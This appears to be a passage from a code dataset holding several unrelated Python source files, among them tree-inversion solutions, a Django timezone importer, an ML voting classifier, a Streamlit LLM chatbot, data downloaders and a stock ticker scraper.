root.left, root.right = root.right, root.left\n # 003 dril down\n self.invertTree(root.left)\n self.invertTree(root.right)\n # 004 restore current level status\n return root\n\n\nclass Solution1: # 44ms\n def invertTree(self, root: TreeNode) -> TreeNode:\n # node= root\n stack = [root]\n while stack:\n node = stack.pop()\n if node:\n node.left, node.right = node.right, node.left\n stack.append(node.right)\n stack.append(node.left)\n return root\n\n # recursively\n def invertTree1(self, root):\n if root:\n root.left, root.right = self.invertTree(root.right), self.invertTree(root.left)\n return root\n\n # BFS\n def invertTree2(self, root):\n queue = collections.deque([(root)])\n while queue:\n node = queue.popleft()\n if node:\n node.left, node.right = node.right, node.left # 变量引用对象,本质上是对象的调换。\n queue.append(node.left)\n queue.append(node.right)\n return root\n\n # DFS\n def invertTree3(self, root):\n stack = [root]\n while stack:\n node = stack.pop()\n if node:\n node.left, node.right = node.right, node.left # 做选择\n stack.extend([node.right, node.left]) # 可以更换添加顺序。不一定非要左右,右左遍历一样可以。\n return root\n","repo_name":"1530426574/practices-of-Data-Structures-and-Algorithms","sub_path":"泛型递归-树的递归/226. 翻转二叉树.py","file_name":"226. 翻转二叉树.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"74185456454","text":"import datetime\nimport decimal\nimport logging\nimport math\nimport os\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom django.db import IntegrityError\n\nfrom geo_ez.models import PostalCode, TimeZone, TimeZoneMap\nfrom geo_ez.python3_compatibility import compatible_urlretrieve\nfrom geo_ez.utility_functions import csv_to_dicts\n\nlogger = logging.getLogger(__name__)\n\nsettings.DEBUG = False\n\ncountries = [\"US\", \"AS\", \"GU\", \"MP\", \"PR\", \"VI\", \"AZ\"]\n\ninsert_threshold = getattr(settings, \"INSERT_THRESHOLD\", 10000)\ndata_dir = getattr(settings, \"DATA_DIR\", os.path.join(settings.MEDIA_ROOT, \"DATA\"))\n\n\nclass Command(BaseCommand):\n help = \"Import Postal Codes from GeoNames.\"\n verbosity = 0\n current_file = None\n log_file_name = None\n log_file = False\n\n init_time = None\n existing_drug_list = []\n drug_insert_list = []\n\n # def add_arguments(self, parser):\n # parser.add_argument(\"address\", type=str)\n\n def _log_message(self, message):\n log_message = \"%s: %s\\n\" % (datetime.datetime.now().isoformat()[0:19], message)\n\n logger.info(message)\n\n if self.verbosity > 0:\n self.stdout.write(log_message)\n\n def _timer(self):\n if not self.init_time:\n self.init_time = datetime.datetime.now()\n self._log_message(\"Command initiated.\")\n else:\n self._log_message(\"Command completed.\")\n\n complete_time = datetime.datetime.now()\n command_total_seconds = (complete_time - self.init_time).total_seconds()\n command_minutes = math.floor(command_total_seconds / 60)\n command_seconds = command_total_seconds - (command_minutes * 60)\n\n self._log_message(\"Command took %i minutes and %i seconds to run.\" % (command_minutes, command_seconds))\n\n def handle(self, *args, **options):\n self.verbosity = int(options[\"verbosity\"])\n\n self._timer()\n\n countries = sorted(list(set(list(PostalCode.objects.all().values_list(\"country_code\", flat=True)))))\n\n self._log_message(\"Processing: %s\" % \",\".join(countries))\n\n import_filename = \"timeZones.txt\"\n import_file_path = os.path.join(data_dir, \"geonames\")\n import_file = os.path.join(import_file_path, import_filename)\n\n if not os.path.exists(import_file_path):\n os.makedirs(import_file_path)\n\n if os.path.exists(import_file):\n os.remove(import_file)\n\n compatible_urlretrieve(\"http://download.geonames.org/export/dump/%s\" % import_filename, import_file)\n\n rows = csv_to_dicts(import_file, delimiter=\"\\t\")\n\n for row in rows:\n country_code = row.get(\"CountryCode\")\n timezone_id = row.get(\"TimeZoneId\")\n gmt_offset_jan = float(row.get(\"GMT offset 1. Jan 2019\"))\n gmt_offset_jul = float(row.get(\"DST offset 1. Jul 2019\"))\n raw_offset = float(row.get(\"rawOffset (independant of DST)\"))\n\n if country_code in countries:\n try:\n time_zone = TimeZone.objects.get(timezone_id=timezone_id)\n\n except TimeZone.DoesNotExist:\n time_zone = TimeZone.objects.create(\n country_code=country_code,\n timezone_id=timezone_id,\n gmt_offset_jan=gmt_offset_jan,\n gmt_offset_jul=gmt_offset_jul,\n raw_offset=raw_offset,\n )\n else:\n time_zone.country_code = country_code\n time_zone.timezone_id = timezone_id\n time_zone.gmt_offset_jan = gmt_offset_jan\n time_zone.gmt_offset_jul = gmt_offset_jul\n time_zone.raw_offset = raw_offset\n\n time_zone.save()\n\n ztz_import_filename = \"tz.data\"\n ztz_import_file = os.path.join(import_file_path, import_filename)\n\n if os.path.exists(ztz_import_file):\n os.remove(ztz_import_file)\n\n compatible_urlretrieve(\n \"https://raw.githubusercontent.com/infused/ziptz/master/data/%s\" % ztz_import_filename, ztz_import_file\n )\n\n ztz_headers = [\"zip_code\", \"timezone_id\"]\n\n ztz_rows = csv_to_dicts(ztz_import_file, delimiter=\"=\", fieldnames=ztz_headers)\n\n for ztz_row in ztz_rows:\n zipcode = ztz_row.get(\"zip_code\")\n timezone_id = ztz_row.get(\"timezone_id\")\n\n if \"APO\" not in timezone_id and \"FPO\" not in timezone_id:\n try:\n tz_map = TimeZoneMap.objects.get(zip_code=zipcode)\n except TimeZoneMap.DoesNotExist:\n try:\n tz_map = TimeZoneMap.objects.create(zip_code=zipcode, time_zone_id=timezone_id)\n except IntegrityError as e:\n self._log_message(e)\n else:\n tz_map.zip_code = zipcode\n tz_map.time_zone_id = timezone_id\n tz_map.save()\n\n self._timer()\n","repo_name":"avryhof/geo_ez","sub_path":"geo_ez/management/commands/import-timezone-data.py","file_name":"import-timezone-data.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17061441618","text":"import pandas as pd\nimport numpy as np\n\n# Import the data\nRAW = pd.read_csv(\"output.csv\")\n\n# prep the data\nylist = RAW['koi_disposition'].to_list()\ny = np.array(ylist)\n\nXdf = RAW.drop(columns=['koi_disposition'])\nxnplist = [np.array(xi) for xi in Xdf.values]\nX = np.stack(xnplist)\n\n\n\n# Intialize the classifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.ensemble import RandomForestClassifier, VotingClassifier\nfrom sklearn import svm\n\nclf1 = LogisticRegression(max_iter = 1000,random_state=1)\nclf2 = RandomForestClassifier(n_estimators=50, random_state=1)\nclf3 = GaussianNB()\nclf4 = svm.SVC(probability = True)\n\neclf1 = VotingClassifier(estimators=[('lr', clf1), ('rf', clf2), ('gnb', clf3), ('svm', clf4)], voting='soft')\n\n\n\n# Train and evaluate the classifier\nfrom sklearn.metrics import classification_report, confusion_matrix, f1_score, accuracy_score\nfrom sklearn.model_selection import KFold\n\nkf = KFold(n_splits=5, random_state=0, shuffle = True)\n\navgs = []\nmacrof1s = []\nmicrof1s = []\nweightedf1s = []\ntps = []\nfps = []\nfns = []\ntns = []\n\n\nfor train_index, test_index in kf.split(X, y):\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n \n eclf1 = eclf1.fit(X_train, y_train)\n \n y_pred = eclf1.predict(X_test)\n avgs.append(accuracy_score(y_test, y_pred))\n macrof1s.append(f1_score(y_test, y_pred, average='macro'))\n microf1s.append(f1_score(y_test, y_pred, average='micro'))\n weightedf1s.append(f1_score(y_test, y_pred, average='weighted'))\n tps.append(confusion_matrix(y_test, y_pred)[0][0])\n fps.append(confusion_matrix(y_test, y_pred)[0][1])\n fns.append(confusion_matrix(y_test, y_pred)[1][0])\n tns.append(confusion_matrix(y_test, y_pred)[1][1])\n \n \n\nprint(\"average Accuracy: \" + str(sum(avgs)/len(avgs)))\nprint(\"average Macro F1 Score: \" + str(sum(macrof1s)/len(avgs)))\nprint(\"average Micro F1 Score: \" + str(sum(microf1s)/len(avgs)))\nprint(\"average weighted F1 Score: \" + str(sum(weightedf1s)/len(avgs)))\nprint(\"average number of true positive rate: \" + str(sum(tps)/len(avgs)))\nprint(\"average number of false positives: \" + str(sum(fps)/len(avgs)))\nprint(\"average number of true negatives: \" + str(sum(fns)/len(avgs)))\nprint(\"average number of true negatives: \" + str(sum(tns)/len(avgs)))","repo_name":"paganflamingo/cse575_proj_data","sub_path":"Code to submit/VotingClassifier.py","file_name":"VotingClassifier.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4211855001","text":"import reqon.deprecated as reqon\nimport unittest\nimport pytest\n\nclass TestQuery(unittest.TestCase):\n def test_query(self):\n query = {\n \"$table\": \"foo\",\n \"$query\": [\n [\"$get\", \"foo\"]\n ]\n }\n\n assert str(reqon.query(query)) == \"r.table('foo').get('foo')\"\n\n def test_invalid_query(self):\n with pytest.raises(reqon.exceptions.ReqonError):\n reqon.query({\"$schema\": \"foo\"})\n","repo_name":"dmpayton/reqon","sub_path":"tests/deprecated/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"30452479600","text":"import ctranslate2\nimport requests\nimport streamlit as st\n\nimport nvidia\nimport os\nimport time\nimport torch\nimport transformers\n\nfrom random import randint\nfrom streamlit.web.server import websocket_headers\nfrom streamlit_chat import message\nfrom transformers import AutoModelForCausalLM, AutoTokenizer, GenerationConfig\n\n\n#Generate the output from the LLM\n# def generate(prompt: str = None, new_tokens: int = 200):\ndef generate(prompt: str = None, pct_new_tokens: float = 1.2):\n if prompt is None:\n return 'Please provide a prompt.'\n \n # Construct the prompt for the model\n user_input = prompt_template.format(dialogue=prompt)\n \n tokens_per_sec = 0\n start_time = time.perf_counter()\n tokens = tokenizer.convert_ids_to_tokens(tokenizer.encode(user_input))\n input_length = len(tokens)\n # new_tokens = round(pct_new_tokens*input_length)\n new_tokens = 400\n tokens_per_sec = 0\n start_time = time.time()\n results = generator.generate_batch([tokens], sampling_topk=5, max_length=new_tokens, include_prompt_in_result=False)\n end_time = time.time()\n output_text = tokenizer.decode(results[0].sequences_ids[0])\n tokens_per_sec = round(new_tokens / (end_time - start_time),3)\n \n# gen_text = pipe_llama7b_chat(user_input)\n \n# input_ids = tokenizer(user_input, return_tensors=\"pt\").input_ids\n# input_ids = input_ids.to('cuda')\n\n# generation_config = GenerationConfig(\n# pad_token_id=tokenizer.pad_token_id,\n# max_new_tokens = new_tokens\n# )\n\n# with torch.no_grad():\n# generated_ids = generator.generate(input_ids, generation_config=generation_config)\n \n# gen_text = tokenizer.batch_decode(generated_ids, skip_special_tokens=True, clean_up_tokenization_spaces=False)[0]\n# end_time = time.perf_counter()\n# gen_text = gen_text.replace(f\"[INST] {prompt} [/INST]\", '')\n\n return {'text_from_llm': output_text, 'tokens_per_sec': tokens_per_sec}\n \n \ncuda_install_dir = '/'.join(nvidia.__file__.split('/')[:-1]) + '/cuda_runtime/lib/'\nos.environ['LD_LIBRARY_PATH'] = cuda_install_dir\n\n\n# Load the model\nmodel_path = '/mnt/data/llama2-ct'\nmodel_device = 'cuda' if torch.cuda.is_available() else 'cpu'\n# model_device = 'cpu'\n\n# load the ctranslate model\ntry: generator\nexcept NameError: \n generator = ctranslate2.Generator(model_path, device=model_device)\n\ntry: tokenizer\nexcept NameError:\n tokenizer = transformers.AutoTokenizer.from_pretrained('subirmansukhani/llama-2-7b-miniguanaco')\n\n# generator = ctranslate2.Generator(model_path, device=model_device)\n# tokenizer = transformers.AutoTokenizer.from_pretrained('subirmansukhani/llama-2-7b-miniguanaco')\n\n\n# load the Huggingface model\n# Reload model in FP16 and merge it with LoRA weights\n# generator = AutoModelForCausalLM.from_pretrained(model_path,\n# low_cpu_mem_usage=True,\n# return_dict=True,\n# cache_dir=\"/mnt/artifacts/llama2-model-cache/\",\n# torch_dtype=torch.float16,\n# device_map='auto',\n# )\n# load the tokenizer\n# tokenizer = transformers.AutoTokenizer.from_pretrained(model_path)\n\n# pipe_llama7b_chat = pipeline(task=\"text-generation\", model=generator, tokenizer=tokenizer, max_length=200, return_full_text=False) \n\nprompt_template = f\"[INST] {{dialogue}} [/INST]\"\n\n\n# Initialise session state variables\nif 'generated' not in st.session_state:\n st.session_state['generated'] = []\nif 'past' not in st.session_state:\n st.session_state['past'] = []\nif 'messages' not in st.session_state:\n st.session_state['messages'] = [\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"}\n ]\nif 'tokens_sec' not in st.session_state:\n st.session_state['tokens_sec'] = []\n\n\nst.set_page_config(initial_sidebar_state='collapsed')\nclear_button = st.sidebar.button(\"Clear Conversation\", key=\"clear\")\n \n\n\nif clear_button:\n st.session_state['generated'] = []\n st.session_state['past'] = []\n st.session_state['tokens_sec'] = []\n st.session_state['messages'] = [\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"}\n ]\n\n\n# container for chat history\nresponse_container = st.container()\n# container for text box\ncontainer = st.container()\n\nwith container:\n with st.form(key='my_form', clear_on_submit=True):\n user_input = st.text_area(\"You:\", key='input', height=150)\n submit_button = st.form_submit_button(label='Send')\n tokens_sec = 0\n if submit_button and user_input :\n with st.spinner(\"Generating response\"):\n prompt = prompt_template.format(dialogue=user_input)\n llm_response = generate(prompt)\n answer = llm_response['text_from_llm']\n tokens_sec = llm_response['tokens_per_sec']\n \n st.session_state['past'].append(user_input)\n st.session_state['generated'].append(answer)\n st.session_state['tokens_sec'].append(tokens_sec)\n \n if st.session_state['generated']:\n with response_container:\n for i in range(len(st.session_state['generated'])):\n message(st.session_state[\"past\"][i], is_user=True,logo='https://freesvg.org/img/1367934593.png', key=str(i) + '_user')\n message(st.session_state[\"generated\"][i], logo='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQk6e8aarUy37BOHMTSk-TUcs4AyAy3pfAHL-F2K49KHNEbI0QUlqWJFEqXYQvlBdYMMJA&usqp=CAU', key=str(i))\n # st.write(f\"Tokens generated per sec: {st.session_state['tokens_sec'][i]}\")\n","repo_name":"ddl-subir-m/llama2-sft-chatbot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6923299767","text":"#coding:UTF-8\nfrom PIL import Image\ndef ImageToMatrix(filename):\n # 读取图片\n im = Image.open(filename)\n # 显示图片\n# im.show()\n width,height = im.size\n im = im.convert(\"L\")\n data = im.getdata()\n data = np.matrix(data,dtype='float')/255.0\n new_data = np.reshape(data,(width,height))\n return new_data\n# new_im = Image.fromarray(new_data)\n# # 显示图片\n# new_im.show()\ndef MatrixToImage(data):\n data = data*255\n new_im = Image.fromarray(data.astype(np.uint8))\n return new_im","repo_name":"changtingwai/cnn_project","sub_path":"keras_conv_nn.py","file_name":"keras_conv_nn.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71243062533","text":"# %%\n# Libraries\nimport datetime as dt\nimport pandas as pd\nimport requests\nimport json\nimport os.path\nimport os\nimport time\nimport tqdm\nfrom datetimerange import DateTimeRange\nfrom Database_Manager import MySQLStationManagerAWS\nfrom BluetoothStation import *\n# %%\n# URL to request vehicle detection in Bluetooth Stations\ndata_url = \"https://mobility.api.opendatahub.bz.it/v2/flat%2Cnode/BluetoothStation/%2A/{}/{}?limit=-1&distinct=true&timezone=UTC\"\ndata_format = \"{}-{}-{}T{}%3A{}%3A{}.000%2B0000\" # YYYY-mm-ddTHH:MM:SS\n\n# %%\n# Get data from sdate to edate, with the possibility of saving data inside filename\ndef get_data_of_day(url, sdate, edate, filename=None):\n try:\n req = requests.get(url.format(data_format.format(sdate.year, \n sdate.strftime(\"%m\"), \n sdate.strftime(\"%d\"),\n sdate.strftime(\"%H\"),\n sdate.strftime(\"%M\"),\n sdate.strftime(\"%S\")),\n data_format.format(edate.year,\n edate.strftime(\"%m\"),\n edate.strftime(\"%d\"),\n edate.strftime(\"%H\"),\n edate.strftime(\"%M\"),\n edate.strftime(\"%S\"))))\n \n day_data = req.json()[\"data\"]\n results = from_json_to_list(day_data)\n headers = [\"Timestamp\", \"Count\", \"Station\"]\n df = pd.DataFrame(results, columns=headers).groupby(['Timestamp','Station'],as_index=False).sum().reset_index().drop('index',axis=1)\n df = df.reindex(columns=headers)\n return df\n except ValueError:\n # Possible error of gateway, retry after 1 minute\n print(\"Gateway Time-out error\")\n time.sleep(60)\n get_data_of_day(url, sdate, edate, filename)\n \n# Convert json data to list with timestamp, count and station\ndef from_json_to_list(json_data: json):\n result = []\n for element in json_data:\n if element['tname'] == \"Bluetooth Count record\" and element['ttype'] == 'Count':\n m = [dt.datetime.strptime(element['mvalidtime'][:19], '%Y-%m-%d %H:%M:%S'),\n element['mvalue'],\n element['sname']]\n result.append(m)\n return result\n# %%\n# Starting from the latest timestamp available inside the db, it gathers data\ndef get_missing_data(url=data_url, data_path = 'data/latest_data.csv'):\n # Manager to communicate with MySQL on EC2\n db = MySQLStationManagerAWS()\n \n # Datetime of the last data gathered\n last_date = db.get_latest_datetime()\n print(\"Last time you downloaded: \"+str(last_date))\n \n try:\n # Creating date range from last time we updated the db till now\n date_range = DateTimeRange(last_date+dt.timedelta(minutes=1),\n dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n date_range = [value for value in date_range.range(dt.timedelta(hours=1))]\n except:\n print(\"Too early to download data.\")\n sys.exit(0)\n # Get data for each hour\n for i in tqdm.trange(len(date_range)-1):\n sdate = date_range[i]\n edate = date_range[i+1]\n \n # Downloading data and saving it in pickle format\n msmt = get_data_of_day(url, sdate, edate)\n \n # saves data in a temporary csv\n if i==0:\n msmt.to_csv(data_path, mode = 'w', header=True, index=False)\n else:\n msmt.to_csv(data_path, mode='a', header=False, index=False) \n\n # Inserting data from csv inside the database \n print(\"Inserting data inside the database...\")\n db.insert_csv_in_db(data_path)\n print(\"Done.\")\n \n # Erasing the content inside latest_data.csv\n with open(data_path,\"w\") as f:\n f.truncate()\n \n# %%\nget_missing_data()","repo_name":"auroramariatumminello/Traffic-Project","sub_path":"py/download_real_time.py","file_name":"download_real_time.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"73567947014","text":"# EXTRACTING LAT AND LNG DATA FROM THE DRIVER TRACKING BQ TABLE HIT THE VEHICLE AND TARIFF API ENDPOINTS, INGEST THE DATA IN BQ TABLE.\n\nimport time\nimport requests\nfrom pytz import timezone\nfrom datetime import datetime\nfrom google.cloud import bigquery\n\n# Initialize the BigQuery client\nclient = bigquery.Client()\n\ndef fetch_data_from_url(url):\n headers = {\n \"Authorization\": \"XXXXX\",\n \"Content-Type\": \"application/json\"\n }\n\n try:\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n response_date=response.json()\n # Convert current datetime to West African Time (WAT)\n nigerian_tz = timezone('Africa/Lagos')\n current_date = datetime.now(nigerian_tz).date().isoformat()\n response_date['data_date'] = current_date\n return response_date\n except requests.exceptions.RequestException as e:\n print(f\"API request error: {e}\")\n return None\n\ndef fetch_vehicle_data(lat, lng):\n api_url = \"https://api.aggregator.app/dispatch/v1/vehicle\"\n url = f\"{api_url}?origin={lat},{lng}\"\n return fetch_data_from_url(url)\n\ndef fetch_tariff_data(lat, lng):\n api_url = \"https://api.aggregator.app/dispatch/v1/tariff\"\n url = f\"{api_url}?origin={lat},{lng}\"\n return fetch_data_from_url(url)\n\n# Define your BigQuery table and dataset information\nproject_id = 'XXXX-1330b'\ndataset_id = 'XXXX_test'\ntable_id = 'XXXX_raw_order_data_test'\n\n# Construct the SQL query to get distinct lat and lng values\nquery = f\"\"\"\n SELECT DISTINCT driverLocation.lat, driverLocation.lng\n FROM `{project_id}.{dataset_id}.{table_id}`\n WHERE DATE(data_date) = CURRENT_DATE();\n\"\"\"\n\n# Execute the query\nquery_job = client.query(query)\nresults = query_job.result()\n\n# Uncomment and indent this block to fetch and process data\nfor row in results:\n lat, lng = row.lat, row.lng\n vehicle_data = fetch_vehicle_data(lat, lng)\n tariff_data = fetch_tariff_data(lat, lng)\n\n # # Add rate limiting to avoid overloading the API\n # time.sleep(1) # Sleep for 1 second between API calls (adjust as needed)\n\n # Define your BigQuery dataset ID\n dataset_id = 'XXXX_test'\n\n # Define the BigQuery table names\n vehicle_table_name = \"vehicle\"\n tariff_table_name = \"tariff\"\n\n # Create or get the BigQuery dataset\n dataset_ref = client.dataset(dataset_id)\n\n vehicle_table_ref = dataset_ref.table(vehicle_table_name)\n tariff_table_ref = dataset_ref.table(tariff_table_name)\n\n try:\n \n client.insert_rows_json(vehicle_table_ref, [vehicle_data])\n client.insert_rows_json(tariff_table_ref, [tariff_data])\n except Exception as e:\n print(f\"Error inserting data: {e}\")","repo_name":"sanket151/bits-project","sub_path":"operating-code/vehicle-tariff.py","file_name":"vehicle-tariff.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35098593029","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 28 10:18:38 2020\r\n\r\n@author: linigodelacruz\r\n\"\"\"\r\nimport numpy as np\r\nfrom collections import defaultdict \r\nimport pandas as pd\r\nfrom tkinter import Tk\r\nfrom tkinter import filedialog\r\nfrom sys import exit\r\n\r\n\r\ndef merging_datasets(gene_name=None,datawithfitness=None,datawithgoterms=None,datawithinteractions=None):\r\n \"\"\"\r\n Function that allows filtering the fitness dataset from Constanzo 2016, with data from \r\n interactions and go terms , genewise. \r\n Inputs:\r\ngene_name= gene on which you want to know the data available , it should be introduced in capitals e.g. 'BEM1'\r\ndata_interactions= here is a dataframe on the data on interactors for example we would like to merge with the fitness one to filtered it \r\ntype_of_interaction_selected=string containing the info of which dataset are we using to filter the fitness data e.g 'synthetic-lethals'\r\n Output: a dataframe with the merge information \r\n \"\"\"\r\n \r\n if gene_name==None:\r\n gene_name='BEM1' # do this gene as an example\r\n \r\n if datawithfitness == None:\r\n \r\n root = Tk()\r\n root.filename = filedialog.askopenfilename(title = \"choose your fitness dataset\",filetypes = ((\"excel files\",\"*.xlsx\"),(\"all files\",\"*.*\")))\r\n filename_fitness=root.filename\r\n root.withdraw()\r\n \r\n if datawithgoterms == None:\r\n \r\n root = Tk()\r\n root.filename = filedialog.askopenfilename(title = \"choose your go terms dataset\",filetypes = ((\"excel files\",\"*.xlsx\"),(\"all files\",\"*.*\")))\r\n filename_go=root.filename\r\n root.withdraw()\r\n \r\n if datawithinteractions== None:\r\n \r\n root = Tk()\r\n root.filename = filedialog.askopenfilename(title = \"choose your interaction type dataset\",filetypes = ((\"excel files\",\"*.xlsx\"),(\"all files\",\"*.*\")))\r\n filename_interactors=root.filename\r\n root.withdraw()\r\n \r\n \r\n datawithfitness=pd.read_excel(filename_fitness)\r\n datawithfitness.columns=['query-allele-name','array-allele-name','score','p-value','query-fitness','array-fitness','double-fitness','double-fitness-std']\r\n \r\n datawithgoterms=pd.read_excel(filename_go)\r\n datawithgoterms.columns=['Gene','gene-id','go-aspect','go-term','go-id','feature-type' ]\r\n \r\n datawithinteractions=pd.read_excel(filename_interactors)\r\n datawithinteractions.columns=['Gene', 'Interactor', 'Assay', 'citation']\r\n \r\n \r\n data_fitness_sga=datawithfitness\r\n data_raw_slim_go=datawithgoterms\r\n \r\n \r\n \r\n \r\n merge_data=defaultdict(dict)\r\n \r\n interactors_gene_name=datawithinteractions[datawithinteractions['Gene']==gene_name]['Interactor'].unique()\r\n constanzo_data=datawithfitness[datawithfitness['query-allele-name']==gene_name.casefold()]['array-allele-name'].tolist()\r\n \r\n if len(constanzo_data)==0:\r\n \r\n constanzo_data=datawithfitness[datawithfitness['array-allele-name']==gene_name.casefold()]['query-allele-name'].tolist()\r\n \r\n if len(constanzo_data)==0:\r\n print('The specified interactors for', gene_name,'are not in the fitness dataset of Constanzo')\r\n exit()\r\n \r\n genes_to_analyze=[]\r\n for i in interactors_gene_name:\r\n if i.casefold() in constanzo_data:\r\n genes_to_analyze.append(i)\r\n \r\n \r\n filtered_genes=genes_to_analyze\r\n data_fitness_sga_subset=data_fitness_sga[data_fitness_sga['query-allele-name']==gene_name.casefold()]\r\n \r\n merge_data=defaultdict(dict)\r\n for i in np.arange(0,len(filtered_genes)):\r\n \r\n \r\n tmp=data_fitness_sga_subset[data_fitness_sga_subset['array-allele-name']==filtered_genes[i].casefold()]\r\n tmp.index=np.arange(0,len(tmp))\r\n if len(tmp)!=0:\r\n \r\n if tmp['query-fitness'].all() > 2 or tmp['array-fitness'].all() > 2 or tmp['double-fitness'].all() >2 : ## these are relative growth rates , so this is to avoid large numbers in the datasets, that are non -interpretable data\r\n tmp['query-fitness']=2\r\n tmp['array-fitness']=2\r\n tmp['double-fitness']=2\r\n \r\n merge_data['gene_name'][filtered_genes[i]]=gene_name\r\n merge_data['array_name'][filtered_genes[i]]=gene_name\r\n merge_data['query-gene'][filtered_genes[i]]=filtered_genes[i]\r\n merge_data['score'][filtered_genes[i]]=tmp['score'].tolist()[0]\r\n merge_data['p-value'][filtered_genes[i]]=tmp['p-value'].tolist()[0]\r\n merge_data['double-fitness'][filtered_genes[i]]=tmp['double-fitness'].tolist()[0]\r\n merge_data['array-fitness'][filtered_genes[i]]=tmp['array-fitness'].tolist()[0]\r\n merge_data['query-fitness'][filtered_genes[i]]=tmp['query-fitness'].tolist()[0]\r\n \r\n \r\n data_go=data_raw_slim_go[data_raw_slim_go['Gene']==filtered_genes[i]]\r\n \r\n \r\n else:\r\n \r\n tmp=data_fitness_sga_subset[data_fitness_sga_subset['query-allele-name']==filtered_genes[i].casefold()]\r\n tmp.index=np.arange(0,len(tmp))\r\n \r\n if tmp['query-fitness'].all() > 2 or tmp['array-fitness'].all() > 2 or tmp['double-fitness'].all() >2 : ## these are relative growth rates , so this is to avoid large numbers in the datasets, that are non -interpretable data\r\n tmp['query-fitness']=2\r\n tmp['array-fitness']=2\r\n tmp['double-fitness']=2\r\n \r\n merge_data['gene_name'][filtered_genes[i]]=gene_name\r\n merge_data['array_name'][filtered_genes[i]]=gene_name\r\n merge_data['query-gene'][filtered_genes[i]]=filtered_genes[i]\r\n merge_data['score'][filtered_genes[i]]=tmp['score'].tolist()[0]\r\n merge_data['p-value'][filtered_genes[i]]=tmp['p-value'].tolist()[0]\r\n merge_data['double-fitness'][filtered_genes[i]]=tmp['double-fitness'].tolist()[0]\r\n merge_data['array-fitness'][filtered_genes[i]]=tmp['array-fitness'].tolist()[0]\r\n merge_data['query-fitness'][filtered_genes[i]]=tmp['query-fitness'].tolist()[0]\r\n \r\n if len(data_go)==0:\r\n merge_data['go-term-filtered-gene'][filtered_genes[i]]='gene not found'\r\n else:\r\n merge_data['go-term-filtered-gene'][filtered_genes[i]]=data_go.iloc[:,3].tolist()\r\n \r\n \r\n \r\n \r\n merge_data_pd=pd.DataFrame(merge_data)\r\n merge_data_numeric=merge_data_pd[pd.to_numeric(merge_data_pd['score'] ,errors='coerce').notnull()]\r\n \r\n \r\n\r\n return merge_data_numeric\r\n\r\n\r\n","repo_name":"SATAY-LL/SATAY-DOWNSTREAM-ANALYSIS","sub_path":"src/python_modules/module_merging_fitness_with_interactions_and_go_terms.py","file_name":"module_merging_fitness_with_interactions_and_go_terms.py","file_ext":"py","file_size_in_byte":6630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12459744196","text":"#make a csv file of all stock tickers found on finwiz.com\n#this makes it easier to make lists that access all ticker symbols\nfrom bs4 import BeautifulSoup\nimport urllib.request\nfrom urllib.request import urlopen\nimport csv\nimport pandas as pd\nfrom pandas import DataFrame, read_csv\n\n\n#Save all of the ticker symbols onto an array and then save to a csv file\ndef make_tickers_csv():\n ticker_list = []\n page_number = 1\n page_numbers = []\n\n #make a number array to make iteration easier in the future\n for i in range(373):\n page_numbers.append(page_number)\n page_number += 20\n\n #iterate through the websites using beautifulsoup and urllib\n #this for loop creates the ticker array\n for number in page_numbers:\n #opens a certain page of tickers depending on the munber given in the number array\n url = 'https://finviz.com/screener.ashx?v=120&r={}'.format(number)\n url_opened = urlopen(url)\n soup = BeautifulSoup(url_opened, 'html.parser')\n\n #finds all of the tickers' links on the page\n #then deletes unnecessary information and adds it to the list \n for a in soup.find_all('a', class_ = 'screener-link-primary'):\n link_old = a.get('href')\n link_new = link_old[13:].replace('&ty=c&p=d&b=1','')\n ticker_list.append(link_new)\n print(number)\n\n #turns the array into a csv with one column and rows that are tickers\n with open(\"All_Tickers_col.csv\", 'w') as resultFile:\n wr = csv.writer(resultFile, dialect = 'excel')\n wr.writerow(['ticker'])\n for val in ticker_list:\n wr.writerow([val])\n\n\n#turns the ticker csv into a list\ndef tickers_to_list():\n a = []\n df = pd.read_csv('All_Tickers_col.csv')\n a = df['ticker'].tolist()\n\n\n","repo_name":"cmodi10/Stock-Trading","sub_path":"findStocksGitHub.py","file_name":"findStocksGitHub.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39224445090","text":"import requests\r\nimport json\r\nimport os\r\nimport yaml\r\nfrom datamodel import SentimentResult\r\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\r\nfrom flask import Flask\r\nfrom flask import request, send_from_directory\r\nfrom nltk.tokenize import sent_tokenize\r\nfrom waitress import serve\r\n\r\nstatic_file_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'static')\r\napp = Flask(__name__, static_url_path='', static_folder='static')\r\nconfig = 